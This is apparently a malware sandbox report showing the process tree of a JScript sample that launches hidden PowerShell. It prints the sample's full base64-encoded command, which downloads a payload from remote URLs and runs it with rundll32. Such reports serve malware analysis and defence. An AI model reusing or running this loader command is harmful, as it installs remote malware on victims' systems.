popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Xpksf.js

    3032

    • wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\Xpksf.js" Aquaphobia araneiformDustheap Denumeral AntipneumococcicNesotragus

      2224

      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABCAHIAaQBkAGcAZQBiAG8AYQByAGQAIAA9ACAANwA0ADAAOwAkAGgAbwBtAG8AbAB5AHMAaQBzAE8AYwB0AGEAcgBjAGgAeQAgAD0AIAAzADUAOwAkAEIAcgBlAHQAZQBzAHMAZQBUAGgAZQBtAGUAcgAgAD0AIAAiAFMAeQBuAGMAZQBkACIAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADsAJAB2AGkAcABlAHIAbwB1AHMARgBpAHIAbQBhAG0AZQBuAHQAYQBsACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBHAEEARwBVAEEAYgBnAEIAdgBBAEgAVQBBAGEAUQBCAHMAQQBHAHcAQQBaAFEAQgAwAEEARgBBAEEAYwBnAEIAbABBAEcAUQBBAGEAUQBCAHoAQQBIAEEAQQBiAHcAQgB1AEEARwBVAEEAYgBnAEIAMABBAEMANABBAGMAZwBCAGwAQQBHAE0AQQBhAFEAQgB3AEEARwBVAEEAYwB3AEEAPQBQAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AQQBBADMAQQBDADQAQQBNAGcAQQB6AEEARABVAEEATABnAEEAeABBAEQAUQBBAE4AZwBBAHUAQQBEAEUAQQBOAHcAQQB3AEEAQQA9AD0AUABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEUAQQBNAEEAQQB1AEEARABJAEEATQB3AEEAMgBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABFAEEATQBRAEEAPQBQAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE0AQQBBAHUAQQBEAEkAQQBNAGcAQQAyAEEAQwA0AEEATQBRAEEAeQBBAEQASQBBAEwAZwBBADUAQQBEAGcAQQAiADsAJAB1AG4AYgBsAHUAZgBmAGUAZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAZwBBAEwAZwBBADUAQQBEAEUAQQBMAHcAQgBZAEEARwA0AEEAWgBBAEEAdgBBAEQAWQBBAGEAQQBCAEQAQQBHADQAQQBjAEEAQgBWAEEARwA4AEEAWgBnAEEAPQBuAFUAeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAEkAQQBMAGcAQQAxAEEARABRAEEATAB3AEEANQBBAEUAYwBBAFUAUQBBADEAQQBFAEUAQQBPAEEAQQB2AEEARwAwAEEAYwBBAEIAbgBBAEYAVQBBAFkAZwBCAHAAQQBIAEUAQQBuAFUAeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBPAEEAQQB1AEEARABJAEEATgBRAEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABnAEEATQBRAEEAdgBBAEcAMABBAGEAUQBCAFMAQQBDADgAQQBXAGcAQgA1AEEARABFAEEAUQBnAEIARABBAEcATQBBAFYAQQBCAHoAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJAB1AG4AZwBlAG4AdABlAGUAbAB5ACAAaQBuACAAJAB1AG4AYgBsAHUAZgBmAGUAZAAgAC0AcwBwAGwAaQB0ACAAIgBuAFUAeQAiACkAIAB7ACQAUABvAGwAeQBtAGEAdABoAHMAVQBuAGQAZQByAGwAYQBwAHAAaQBuAGcAIAA9ACAAOAAzADcAOwB0AHIAeQAgAHsAJABoAHkAZAByAG8AbAB5AHoAZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgAwAEEARwBVAEEAZABBAEIAeQBBAEcARQBBAFkAdwBCAGwAQQBIAEkAQQBkAFEAQgB6AEEARQBRAEEAYQBRAEIAegBBAEgAQQBBAFoAUQBCAHYAQQBIAEEAQQBiAEEAQgBsAEEARwAwAEEAWgBRAEIAdQBBAEgAUQBBAEwAZwBCADAAQQBHADgAQQBiAHcAQgBzAEEASABNAEEASQBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAG8AQQBHAFUAQQBhAFEAQgB5AEEARwBVAEEAWgBBAEIAVABBAEgAVQBBAGMAQQBCAGwAQQBIAEkAQQBjAHcAQgAxAEEARwB3AEEAYwBBAEIAbwBBAEgAVQBBAGMAZwBCAGwAQQBIAFEAQQBMAGcAQgB3AEEARwBrAEEAWQB3AEIAMABBAEgAVQBBAGMAZwBCAGwAQQBIAE0AQQAiADsAJABwAHIAZQBhAGMAYwBvAG0AbQBvAGQAYQB0AGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAdQBuAGcAZQBuAHQAZQBlAGwAeQApACkAOwBpAHcAcgAgACQAcAByAGUAYQBjAGMAbwBtAG0AbwBkAGEAdABlACAALQBPACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVAByAGkAZwBnAGUAcgBmAGkAcwBoAE8AcgBkAG8AdgBpAGEAbgAuAFUAbgBpAGYAbABvAHcAZQByAGUAZAA7ACQAbwByAGQAdQByAG8AdQBzAG4AZQBzAHMAVABvAHAAZQByAGQAbwBtACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBBAEEAMwBBAEMANABBAE0AZwBBAHgAQQBEAGcAQQBMAGcAQQB4AEEARABFAEEATQBnAEEAdQBBAEQARQBBAE0AQQBBADQAQQBBAD0APQB0AGQAWgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAEUAQQBjAGcAQgBqAEEARwBnAEEAWgBRAEIAdQBBAEcATQBBAFoAUQBCAHcAQQBHAGcAQQBZAFEAQgBzAEEARwBrAEEAWQB3AEIASABBAEgASQBBAFkAUQBCAHUAQQBIAFkAQQBhAFEAQgBzAEEARwB3AEEAWgBRAEEAdQBBAEcAVQBBAGIAZwBCAG4AQQBHAGsAQQBiAGcAQgBsAEEARwBVAEEAYwBnAEIAcABBAEcANABBAFoAdwBBAD0AIgA7ACQAYgBvAG8AawBiAGkAbgBkAGUAcgBBAHMAYwBlAHIAdABhAGkAbgBtAGUAbgB0ACAAPQAgACIASABvAGwAbwBzAGkAZABlACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVAByAGkAZwBnAGUAcgBmAGkAcwBoAE8AcgBkAG8AdgBpAGEAbgAuAFUAbgBpAGYAbABvAHcAZQByAGUAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAOAAxADQAMQAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBWAEEAQgB5AEEARwBrAEEAWgB3AEIAbgBBAEcAVQBBAGMAZwBCAG0AQQBHAGsAQQBjAHcAQgBvAEEARQA4AEEAYwBnAEIAawBBAEcAOABBAGQAZwBCAHAAQQBHAEUAQQBiAGcAQQB1AEEARgBVAEEAYgBnAEIAcABBAEcAWQBBAGIAQQBCAHYAQQBIAGMAQQBaAFEAQgB5AEEARwBVAEEAWgBBAEEAcwBBAEUAUQBBAGIAQQBCAHMAQQBGAEkAQQBaAFEAQgBuAEEARwBrAEEAYwB3AEIAMABBAEcAVQBBAGMAZwBCAFQAQQBHAFUAQQBjAGcAQgAyAEEARwBVAEEAYwBnAEEANwBBAEUARQBBAGIAZwBCAG4AQQBIAFUAQQBiAEEAQgBoAEEASABJAEEAIgA7ACQAYQBkAHUAbAB0AGUAcgBpAHoAZQAgAD0AIAA5ADIAMwA7AGIAcgBlAGEAawA7AEEAbgBnAHUAbABhAHIAOwB9AEEAbgBnAHUAbABhAHIAOwB9ACAAYwBhAHQAYwBoACAAewAkAEkAbgB2AGkAZwBvAHIAYQB0AG8AcgAgAD0AIAA5ADcANAA7AH0AfQAkAFUAbgBzAGUAZQBtAGwAeQAgAD0AIAA4ADMAMQA7AEEAbgBnAHUAbABhAHIAOwA="

        2372

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf